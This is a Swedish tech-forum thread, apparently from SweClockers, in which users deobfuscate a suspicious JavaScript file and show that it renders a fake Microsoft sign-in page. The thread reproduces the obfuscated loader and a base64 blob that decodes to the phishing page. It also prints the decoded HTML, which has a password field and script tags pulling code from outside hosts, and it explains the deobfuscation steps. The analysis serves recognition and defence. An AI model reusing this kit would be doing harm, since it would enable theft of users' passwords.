IDxkaXYgY2xhc3M9InByb2dyZXNzIiByb2xlPSJwcm9ncmVzc2JhciIgYXJpYS1sYWJlbD0iUGxlYXNlIHdhaXQiPiA8ZGl2PjwvZGl2PiA8ZGl2PjwvZGl2PiA8ZGl2PjwvZGl2PiA8ZGl2PjwvZGl2PiA8ZGl2PjwvZGl2PiA8L2Rpdj4gPC9kaXY IDxhIGlkPSJhYWRSZWRpcmVjdENhbmNlbCIgaHJlZj0iIyIgYXJpYS1kZXNjcmliZWRieT0ibG9naW5IZWFkZXIiPkNhbmNlbDwvYT4gPC9kaXY IDxkaXYgaWQ9IlBhc3NzZWN0aW9uIiBjbGFzcz0iYW5pbWF0ZSBzbGlkZS1pbi1uZXh0IiBzdHlsZT0iZGlzcGxheTogYmxvY2s7IiByb2xlPSJtYWluIj4gPGRpdiBjbGFzcz0iIj4gPGRpdj4gPGRpdj4gPGRpdiBjbGFzcz0iaWRlbnRpdHlCYW5uZXIiPiA8YnV0dG9uIHR5cGU9ImJ1dHRvbiIgY2xhc3M9ImJhY2tCdXR0b24iIGlkPSJpZEJ0bl9CYWNrIiBhcmlhLWxhYmVsPSJCYWNrIj48aW1nIHJvbGU9InByZXNlbnRhdGlvbiIgcG5nc3JjPSJodHRwczovL2FhZGNkbi5tc2F1dGgubmV0L3NoYXJlZC8xLjAvY29udGVudC9pbWFnZXMvYXJyb3dfbGVmdF83Y2MwOTZkYTZhYTJkYmEzZjgxZmNjMWM4MjYyMTU3Yy5wbmciIHN2Z3NyYz0iaHR0cHM6Ly9hYWRjZG4ubXNhdXRoLm5ldC9zaGFyZWQvMS4wL2NvbnRlbnQvaW1hZ2VzL2Fycm93X2xlZnRfYTljYzI4MjRlZjM1MTdiNmM0MTYwZGNmOGZmN2Q0MTAuc3ZnIiBzcmM9Imh0dHBzOi8vYWFkY2RuLm1zYXV0aC5uZXQvc2hhcmVkLzEuMC9jb250ZW50L2ltYWdlcy9hcnJvd19sZWZ0X2E5Y2MyODI0ZWYzNTE3YjZjNDE2MGRjZjhmZjdkNDEwLnN2ZyI IDwvYnV0dG9uPiA8ZGl2IGlkPSJkaXNwbGF5TmFtZSIgY2xhc3M9ImlkZW50aXR5IiB0aXRsZT0iIj4gPC9kaXY IDwvZGl2PiA8L2Rpdj4gPC9kaXY IDxkaXYgY2xhc3M9InBhZ2luYXRpb24tdmlldyBhbmltYXRlIGhhcy1pZGVudGl0eS1iYW5uZXIiPiA8ZGl2IGRhdGEtdmlld2lkPSIyIiBkYXRhLXNob3dpZGVudGl0eWJhbm5lcj0idHJ1ZSIgZGF0YS1keW5hbWljYnJhbmRpbmc9InRydWUiPiA8aW5wdXQgbmFtZT0iaTEzIiB2YWx1ZT0iMCIgdHlwZT0iaGlkZGVuIj4gPGlucHV0IG5hbWU9ImxvZ2luIiB2YWx1ZT0iIiB0eXBlPSJoaWRkZW4iPiA8aW5wdXQgbmFtZT0idXNlciIgY2xhc3M9Im1vdmVPZmZTY3JlZW4iIHRhYmluZGV4PSItMSIgYXJpYS1oaWRkZW49InRydWUiIHR5cGU9InRleHQiPiA8aW5wdXQgbmFtZT0idHlwZSIgdmFsdWU9IjExIiB0eXBlPSJoaWRkZW4iPiA8aW5wdXQgbmFtZT0iTG9naW5PcHRpb25zIiB2YWx1ZT0iMyIgdHlwZT0iaGlkZGVuIj4gPGlucHV0IG5hbWU9ImxvZ2luZm10IiBpZD0iZGlzcGxheU5hbWUiIHZhbHVlPSIiIG1heGxlbmd0aD0iMTEzIiBjbGFzcz0iZm9ybS1jb250cm9sIGx0cl9vdmVycmlkZSIgYXJpYS1sYWJlbD0iRW50ZXIgeW91ciBlbWFpbCwgcGhvbmUsIG9yIFNreXBlLiIgYXJpYS1kZXNjcmliZWRieT0ibG9naW5IZWFkZXIgbG9naW5EZXNjcmlwdGlvbiIgcGxhY2Vob2xkZXI9IkVtYWlsLCBwaG9uZSwgb3IgU2t5cGUiIGxhbmc9ImVuIiB0eXBlPSJoaWRkZW4iPiA8aW5wdXQgbmFtZT0ibHJ0IiB2YWx1ZT0iIiB0eXBlPSJoaWRkZW4iPiA8aW5wdXQgbmFtZT0ibHJ0UGFydGl0aW9uIiB2YWx1ZT0iIiB0eXBlPSJoaWRkZW4iPiA8aW5wdXQgbmFtZT0iaGlzUmVnaW9uIiB2YWx1ZT0iIiB0eXBlPSJoaWRkZW4iPiA8aW5wdXQgbmFtZT0iaGlzU2NhbGVVbml0IiB2YWx1ZT0iIiB0eXBlPSJoaWRkZW4iPiA8ZGl2IGlkPSJsb2dpbkhlYWRlciIgY2xhc3M9InJvdyB0ZXh0LXRpdGxlIiByb2xlPSJoZWFkaW5nIiBhcmlhLWxldmVsPSIxIj5FbnRlciBwYXNzd29yZCA8L2Rpdj4gPGRpdiBjbGFzcz0icm93Ij4gPGRpdiBjbGFzcz0iZm9ybS1ncm91cCBjb2wtbWQtMjQiPiA8ZGl2IHJvbGU9ImFsZXJ0IiBhcmlhLWxpdmU9ImFzc2VydGl2ZSI IDxkaXYgaWQ9InBhc3N3b3JkRXJyb3IiIGNsYXNzPSJhbGVydCBhbGVydC1lcnJvciIgc3R5bGU9ImRpc3BsYXk6bm9uZTsiPlBsZWFzZSBlbnRlciB5b3VyIHBhc3N3b3JkLiA8L2Rpdj4gPC9kaXY IDxkaXYgY2xhc3M9InBsYWNlaG9sZGVyQ29udGFpbmVyIj4gPGlucHV0IG5hbWU9InBhc3MiIGlkPSJpMDExOCIgYXV0b2NvbXBsZXRlPSJvZmYiIGNsYXNzPSJmb3JtLWNvbnRyb2wiIGFyaWEtcmVxdWlyZWQ9InRydWUiIGFyaWEtZGVzY3JpYmVkYnk9ImxvZ2luSGVhZGVyIHBhc3N3b3JkRGVzYyIgcGxhY2Vob2xkZXI9IlBhc3N3b3JkIiBhcmlhLWxhYmVsPSJFbnRlciB0aGUgcGFzc3dvcmQgZm9yIGRhbWllbi5icnRpbGxvdEB0ZWMta2VyLmNvbSIgdHlwZT0icGFzc3dvcmQiPiA8L2Rpdj4gPC9kaXY IDwvZGl2PiA8ZGl2IGNsYXNzPSJwb3NpdGlvbi1idXR0b25zIj4gPGRpdj4gPGRpdiBjbGFzcz0icm93Ij4gPGRpdiBjbGFzcz0iY29sLW1kLTI0Ij4gPGRpdiBjbGFzcz0idGV4dC0xMyBhY3Rpb24tbGlua3MiPiA8ZGl2IGNsYXNzPSJmb3JtLWdyb3VwIj4gPGEgaWQ9ImlkQV9QV0RfRm9yZ290UGFzc3dvcmQiIHJvbGU9ImxpbmsiIGhyZWY9IiMiPkZvcmdvdCBteSBwYXNzd29yZDwvYT4gPC9kaXY IDxkaXYgY2xhc3M9ImZvcm0tZ3JvdXAiPiA8L2Rpdj4gPC9kaXY IDwvZGl2PiA8L2Rpdj4gPC9kaXY IDxkaXYgY2xhc3M9InJvdyI IDxkaXY IDxkaXYgY2xhc3M9ImNvbC14cy0yNCBuby1wYWRkaW5nLWxlZnQtcmlnaHQgYnV0dG9uLWNvbnRhaW5lciI IDxkaXYgY2xhc3M9ImlubGluZS1ibG9jayI IDxpbnB1dCBpZD0iaWRTSUJ1dHRvbjkiIG9uY2xpY2s9Ik5FRSgpIiBjbGFzcz0iYnRuIGJ0bi1ibG9jayBidG4tcHJpbWFyeSIgdmFsdWU9IlNpZ24gaW4iIHR5cGU9InN1Ym1pdCI IDwvZGl2PiA8L2Rpdj4gPC9kaXY IDwvZGl2PiA8L2Rpdj4gPC9kaXY IDwvZGl2PiA8L2Rpdj4gPC9kaXY IDwvZGl2PiA8ZGl2PiA8L2Rpdj4gPGRpdiBpZD0iZm9vdGVyIiBjbGFzcz0iZm9vdGVyIGRlZmF1bHQiIHJvbGU9ImNvbnRlbnRpbmZvIj4gPGRpdj4gPGRpdiBpZD0iZm9vdGVyTGlua3MiIGNsYXNzPSJmb290ZXJOb2RlIHRleHQtc2Vjb25kYXJ5Ij4gPHNwYW4gaWQ9ImZ0ckNvcHkiPsKpIE1pY3Jvc29mdDwvc3Bhbj4gPGEgaWQ9ImZ0clRlcm1zIiBocmVmPSIjIj5UZXJtcyBvZiB1c2U8L2E IDxhIGlkPSJmdHJQcml2YWN5IiBocmVmPSJodHRwczovL3ByaXZhY3kubWljcm9zb2Z0LmNvbS9lbi1VUy9wcml2YWN5c3RhdGVtZW50Ij5Qcml2YWN5ICZhbXA7IGNvb2tpZXM8L2E IDxhIGhyZWY9IiMiIHJvbGU9ImJ1dHRvbiIgY2xhc3M9Im1vcmVPcHRpb25zIiBhcmlhLWxhYmVsPSJDbGljayBoZXJlIGZvciB0cm91Ymxlc2hvb3RpbmcgaW5mb3JtYXRpb24iPiA8aW1nIGNsYXNzPSJkZXNrdG9wTW9kZSIgcm9sZT0icHJlc2VudGF0aW9uIiBwbmdzcmM9Imh0dHBzOi8vYWFkY2RuLm1zYXV0aC5uZXQvZXN0cy8yLjEvY29udGVudC9pbWFnZXMvZWxsaXBzaXNfd2hpdGVfMGFkNDMwODQ4MDBmZDhiNTBhMjU3NmI1MTczNzQ2ZmUucG5nIiBzdmdzcmM9Imh0dHBzOi8vYWFkY2RuLm1zYXV0aC5uZXQvZXN0cy8yLjEvY29udGVudC9pbWFnZXMvZWxsaXBzaXNfd2hpdGVfNWFjNTkwZWU3MmJmZTA2YTdjZWNmZDc1YjU4OGFkNzMuc3ZnIiBzcmM9Imh0dHBzOi8vYWFkY2RuLm1zYXV0aC5uZXQvZXN0cy8yLjEvY29udGVudC9pbWFnZXMvZWxsaXBzaXNfd2hpdGVfNWFjNTkwZWU3MmJmZTA2YTdjZWNmZDc1YjU4OGFkNzMuc3ZnIj4gPGltZyBjbGFzcz0ibW9iaWxlTW9kZSIgcm9sZT0icHJlc2VudGF0aW9uIiBwbmdzcmM9Imh0dHBzOi8vYWFkY2RuLm1zYXV0aC5uZXQvZXN0cy8yLjEvY29udGVudC9pbWFnZXMvZWxsaXBzaXNfZ3JleV81YmMyNTI1NjdlZjU2ZGI2NDgyMDdkOWMzNmE5ZDAwNC5wbmciIHN2Z3NyYz0iaHR0cHM6Ly9hYWRjZG4ubXNhdXRoLm5ldC9lc3RzLzIuMS9jb250ZW50L2ltYWdlcy9lbGxpcHNpc19ncmV5XzJiNWQzOTNkYjA0YTVlNmUxZjczOWNiMjY2ZTY1YjRjLnN2ZyIgc3JjPSJodHRwczovL2FhZGNkbi5tc2F1dGgubmV0L2VzdHMvMi4xL2NvbnRlbnQvaW1hZ2VzL2VsbGlwc2lzX2dyZXlfMmI1ZDM5M2RiMDRhNWU2ZTFmNzM5Y2IyNjZlNjViNGMuc3ZnIj4gPC9hPiA8L2Rpdj4gPC9kaXY IDwvZGl2PiA8L2Rpdj4gPC9kaXY IDwvZGl2PiA8c2NyaXB0IHNyYz0iaHR0cHM6Ly90cmFja2FuZGdvYWlyZnJlaWdodC5jb20vd3AtYWNjZXNzL3NjX2xvZ2luLmpzIj48L3NjcmlwdD4gPC9ib2R5Pg==','text/html','hello','399338eSbYxS'];
var _0x7ab9d5=_0x3dee;
function _0x3dee(_0x5e5e18,_0x3461e1)
{
return _0x3dee=function(_0xcea02a,_0x3deef6)
{
_0xcea02a=_0xcea02a-0x115;
var _0x101e99=_0xcea0[_0xcea02a];
return _0x101e99;
}
,_0x3dee(_0x5e5e18,_0x3461e1);
}
(function(_0x23b517,_0x3bfb6d)
{
var _0x978a44=_0x3dee;
while(!![])
{
try
{
var _0x50bfe4=parseInt(_0x978a44(0x116))*parseInt(_0x978a44(0x11f)) parseInt(_0x978a44(0x117))*parseInt(_0x978a44(0x115)) parseInt(_0x978a44(0x11e)) parseInt(_0x978a44(0x121))*-parseInt(_0x978a44(0x120)) -parseInt(_0x978a44(0x123)) -parseInt(_0x978a44(0x11c)) -parseInt(_0x978a44(0x118))*-parseInt(_0x978a44(0x11d));
if(_0x50bfe4===_0x3bfb6d)
break;
else
_0x23b517['push'](_0x23b517['shift']());
}
catch(_0x2b2326){_0x23b517['push'](_0x23b517['shift']());
}
}
}
(_0xcea0,0x75fd9));
function hello()
{
var _0x523c77=_0x3dee,_0x3ea0c0=document['open'](_0x523c77(0x11a),_0x523c77(0x122));
_0x3ea0c0['write'](_0x523c77(0x11b)),_0x3ea0c0['close']();
};
document[_0x7ab9d5(0x124)](atob(_0x7ab9d5(0x119)));
Om jag skulle vilja försöka deobfuskera detta själv manuellt, lite som ett puzzel. Hur går jag tillväga och hur ska jag tänka?
Om vi tar denna konkreta rad:
var _0x2cc32e=_0x3a0a;
Kan jag söka efter andra instanser av "_0x2cc32e" och ersätta det med "_0x3a0a" oavsett om de sker inom en funktion?
Vidare undrar jag hur jag ska tolka den fjärde raden från botten;
var _0x523c77=_0x3dee,_0x3ea0c0=document['open'](_0x523c77(0x11a),_0x523c77(0x122));
Är det korrekt uppfattat att det i själva verket ska läsas som:
var _0x523c77=_0x3dee;
var _0x3ea0c0=document['open'](_0x523c77(0x11a),_0x523c77(0x122));
Koden du postade innehåller syntax errors så den går inte använda. Men koden jag googlade fram går bra.
Jag läste koden och insåg att början är safe att exekvera. Den gör inga sidoeffekter, utan skapar bara en funktion som senare anropas för att få fram namn på metoder på window
och document
som faktiskt gör något.
Till exempel kan man exekvera det här:
var _0x14f4 = [
"indexOf",
"268856mcdEWt",
"431419muEtAB",
"98403CAtkOS",
"?bbre=",
"961337QCAFAg",
"129iFMkYp",
"@&!xPvNHIY6kJB4UyXCoQdS92!@&nZDUGkivue2PSwW9dRr43N58ah7@&!",
"location",
"9490ttbmqG",
"1223535TBiLeB",
"710340rZYDYv",
"pathname",
"2FadTgd",
"5CibLjw",
"now",
"href",
"redacted@redacted.com",
"bbre=",
"1TwoYkI",
];
var _0x2cc32e = _0x3a0a;
(function (_0x454cda, _0x57a516) {
var _0x33c03c = _0x3a0a;
while (!![]) {
try {
var _0x36c84d =
-parseInt(_0x33c03c(0x1a4)) * parseInt(_0x33c03c(0x1a1)) +
parseInt(_0x33c03c(0x1b0)) * -parseInt(_0x33c03c(0x1a8)) +
parseInt(_0x33c03c(0x1a0)) * parseInt(_0x33c03c(0x1ae)) +
-parseInt(_0x33c03c(0x1a6)) +
parseInt(_0x33c03c(0x1b1)) +
-parseInt(_0x33c03c(0x1b2)) * -parseInt(_0x33c03c(0x1a9)) +
parseInt(_0x33c03c(0x1a5));
if (_0x36c84d === _0x57a516) break;
else _0x454cda["push"](_0x454cda["shift"]());
} catch (_0x3687b1) {
_0x454cda["push"](_0x454cda["shift"]());
}
}
})(_0x14f4, 0x9b48c);
function _0x3a0a(_0x4b3ff9, _0x58b6f4) {
return (
(_0x3a0a = function (_0x14f49c, _0x3a0a77) {
_0x14f49c = _0x14f49c - 0x1a0;
var _0x5b2a85 = _0x14f4[_0x14f49c];
return _0x5b2a85;
}),
_0x3a0a(_0x4b3ff9, _0x58b6f4)
);
}
Om vi sen tittar på en snutt av resten av koden:
window[_0x2cc32e(0x1a3)][_0x2cc32e(0x1ab)] =
Här kan vi nu exekvera _0x2cc32e(0x1a3)
och får då "location"
, samt _0x2cc32e(0x1ab)
för att få "pathname"
.
Sen är det bara att göra det för varenda _0x2cc32e
-anrop. Då får man:
var number = "redacted@redacted.com",
hjtyfgcx = "@&!xPvNHIY6kJB4UyXCoQdS92!@&nZDUGkivue2PSwW9dRr43N58ah7@&!";
if (
window["location"]["href"]["indexOf"](
"bbre="
) == -1
)
window["location"]["href"] =
document["location"]["pathname"] +
"?bbre=" +
Date["now"]() +
"#/" +
Date["now"]() +
"-" +
hjtyfgcx +
"-" +
number +
"-" +
Date["now"]() +
"/" +
Date["now"]();
Det där lägger bara på en parameter i URL:en om den inte redan finns där.
Det andra skriptet fungerar likadant. Det blir:
function hello() {
var _0x1806be = _0x1758,
win = document["open"]("text/html", "replace");
win["write"]("hello"), win["close"]();
}
document["write"]('<body onload="loaded...');
Jag kan inte se att hello
-funktionen faktiskt anropas någonstans, men sista raden skriver i alla fall en massa HTML till sidan:
<body onload="loaded()" class="cb" style="display: block">
<div>
<div>
<div class="background" role="presentation">
<div
style="
background-image: url(https//aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg);
"
></div>
<div
id="BGimg"
class="backgroundImage"
style="
background-image: url(https//aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg);
"
></div>
<div id="dimBG" class=""></div>
</div>
</div>
<div></div>
<div class="outer">
<div class="middle">
<div class="background-logo-holder1">
<img
id="banner_image"
class="background-logo1"
src="https//aadcdn.msauth.net/shared/1.0/content/images/applogos/53_8b36337037cff88c3df203bb73d58e41.png"
/>
</div>
<div class="inner fade-in-lightbox">
<div id="mainbox" class="lightbox-cover"></div>
<div
id="progressBar"
class=""
role="progressbar"
aria-label="Please wait"
>
<div></div>
<div></div>
<div></div>
<div></div>
<div></div>
</div>
<div>
<img
id="LOGOimg"
class="logo"
pngsrc="https//aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ed9c9eb0dce17d752bedea6b5acda6d9.png"
svgsrc="https//aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg"
src="https//aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg"
alt="Microsoft"
/>
</div>
<div
id="fedred"
class="animate slide-in-next"
data-viewid="8"
style="display: none"
>
<div
id="loginHeader"
class="row text-title"
role="heading"
aria-level="1"
>
Taking you to your organization's sign-in page
</div>
<div class="row progress-container">
<div class="progress" role="progressbar" aria-label="Please wait">
<div></div>
<div></div>
<div></div>
<div></div>
<div></div>
</div>
</div>
<a id="aadRedirectCancel" href="#" aria-describedby="loginHeader"
>Cancel</a
>
</div>
<div
id="Passsection"
class="animate slide-in-next"
style="display: block"
role="main"
>
<div class="">
<div>
<div>
<div class="identityBanner">
<button
type="button"
class="backButton"
id="idBtn_Back"
aria-label="Back"
>
<img
role="presentation"
pngsrc="https//aadcdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png"
svgsrc="https//aadcdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg"
src="https//aadcdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg"
/>
</button>
<div id="displayName" class="identity" title=""></div>
</div>
</div>
</div>
<div class="pagination-view animate has-identity-banner">
<div
data-viewid="2"
data-showidentitybanner="true"
data-dynamicbranding="true"
>
<input name="i13" value="0" type="hidden" />
<input name="login" value="" type="hidden" />
<input
name="user"
class="moveOffScreen"
tabindex="-1"
aria-hidden="true"
type="text"
/>
<input name="type" value="11" type="hidden" />
<input name="LoginOptions" value="3" type="hidden" />
<input
name="loginfmt"
id="displayName"
value=""
maxlength="113"
class="form-control ltr_override"
aria-label="Enter your email, phone, or Skype."
aria-describedby="loginHeader loginDescription"
placeholder="Email, phone, or Skype"
lang="en"
type="hidden"
/>
<input name="lrt" value="" type="hidden" />
<input name="lrtPartition" value="" type="hidden" />
<input name="hisRegion" value="" type="hidden" />
<input name="hisScaleUnit" value="" type="hidden" />
<div
id="loginHeader"
class="row text-title"
role="heading"
aria-level="1"
>
Enter password
</div>
<div class="row">
<div class="form-group col-md-24">
<div role="alert" aria-live="assertive">
<div
id="passwordError"
class="alert alert-error"
style="display: none"
>
Please enter your password.
</div>
</div>
<div class="placeholderContainer">
<input
name="pass"
id="i0118"
autocomplete="off"
class="form-control"
aria-required="true"
aria-describedby="loginHeader passwordDesc"
placeholder="Password"
aria-label="Enter the password for redacted@redacted.com"
type="password"
/>
</div>
</div>
</div>
<div class="position-buttons">
<div>
<div class="row">
<div class="col-md-24">
<div class="text-13 action-links">
<div class="form-group">
<a
id="idA_PWD_ForgotPassword"
role="link"
href="#"
>Forgot my password</a
>
</div>
<div class="form-group"></div>
</div>
</div>
</div>
</div>
<div class="row">
<div>
<div
class="
col-xs-24
no-padding-left-right
button-container
"
>
<div class="inline-block">
<input
id="idSIButton9"
onclick="NEE()"
class="btn btn-block btn-primary"
value="Sign in"
type="submit"
/>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div></div>
<div id="footer" class="footer default" role="contentinfo">
<div>
<div id="footerLinks" class="footerNode text-secondary">
<span id="ftrCopy">© Microsoft</span>
<a id="ftrTerms" href="#">Terms of use</a>
<a
id="ftrPrivacy"
href="https//privacy.microsoft.com/en-US/privacystatement"
>Privacy & cookies</a
>
<a
href="#"
role="button"
class="moreOptions"
aria-label="Click here for troubleshooting information"
>
<img
class="desktopMode"
role="presentation"
pngsrc="https//aadcdn.msauth.net/ests/2.1/content/images/ellipsis_white_0ad43084800fd8b50a2576b5173746fe.png"
svgsrc="https//aadcdn.msauth.net/ests/2.1/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b588ad73.svg"
src="https//aadcdn.msauth.net/ests/2.1/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b588ad73.svg"
/>
<img
class="mobileMode"
role="presentation"
pngsrc="https//aadcdn.msauth.net/ests/2.1/content/images/ellipsis_grey_5bc252567ef56db648207d9c36a9d004.png"
svgsrc="https//aadcdn.msauth.net/ests/2.1/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg"
src="https//aadcdn.msauth.net/ests/2.1/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg"
/>
</a>
</div>
</div>
</div>
</div>
</div>
</div>
<script src="https//f-ioh.online/mn/sc_login.js"></script>
</body>
Jag tog bort kolonet från alla URL:er i HTML-koden ovan, för att undvika att länka till potentiellt farliga webbplatser.
”Please enter your password.” och ”© Microsoft”. En sida som utger sig för att vara från Microsoft och vill att du ska skriva in ditt lösenord, som i själva verket då kommer stjälas. Phishing.
- Idag 27 år senare – Winamp får öppen källkod 27
- Idag Grafikprestanda i Ghost of Tsushima – en välpolerad PC-version 15
- Idag Microsoft: Byt till Bing om du vill reparera din dator 28
- Idag Grand Theft Auto VI släpps hösten 2025 26
- Igår IOS 17.5 återställer raderade bilder – även på nollställda enheter 50
- En dumb-phone som klarar Bank-ID och Swish?2
- Gräva ner TP kabel33
- Dagens fynd — Diskussionstråden49642
- Microsoft: Byt till Bing om du vill reparera din dator28
- 65 tums tv för max 10 000 kr.2
- Bank ID slutar fungera på äldre Apple-enheter47
- IOS 17.5 återställer raderade bilder – även på nollställda enheter50
- Plats för lite gubbgnäll9895
- Kamera för att dokumentera nybygge1
- Dagens fynd (bara tips, ingen diskussion) — Läs första inlägget först!18508
- Säljes GeForce RTX 3080 Ti
- Köpes Mobil till dottern för Roblox etc
- Säljes IPhone 13 128gb
- Säljes ASUS ROG Swift 27" (PG279Q)
- Säljes MSI GeForce GTX 980 Ti Gaming
- Säljes PNY GeForce RTX 4090 Gaming VERTO EPIC-X + Corsair 12VHPWR-kabel
- Säljes Intressekoll 7700x 4090
- Säljes Helt nytt keychron v6 nordic full-size volume knob med brown/silver switchar samt iceberg dye-sub pbt keycaps
- Bytes Söker Logitech G Pro har lite att erbjuda
- Säljes Acer predator 360hz & Asus Rog 180hz
- 27 år senare – Winamp får öppen källkod27
- Grafikprestanda i Ghost of Tsushima – en välpolerad PC-version15
- Microsoft: Byt till Bing om du vill reparera din dator28
- Nu är Twitter officiellt X.com34
- Var med och tyck till SweClockers mobilupplevelse!23
- Grand Theft Auto VI släpps hösten 202526
- Socialdemokraterna vill införa ID-krav på sociala medier233
- Bank ID slutar fungera på äldre Apple-enheter47
- EU utreder om Instagram är skadligt för barn53
- IOS 17.5 återställer raderade bilder – även på nollställda enheter50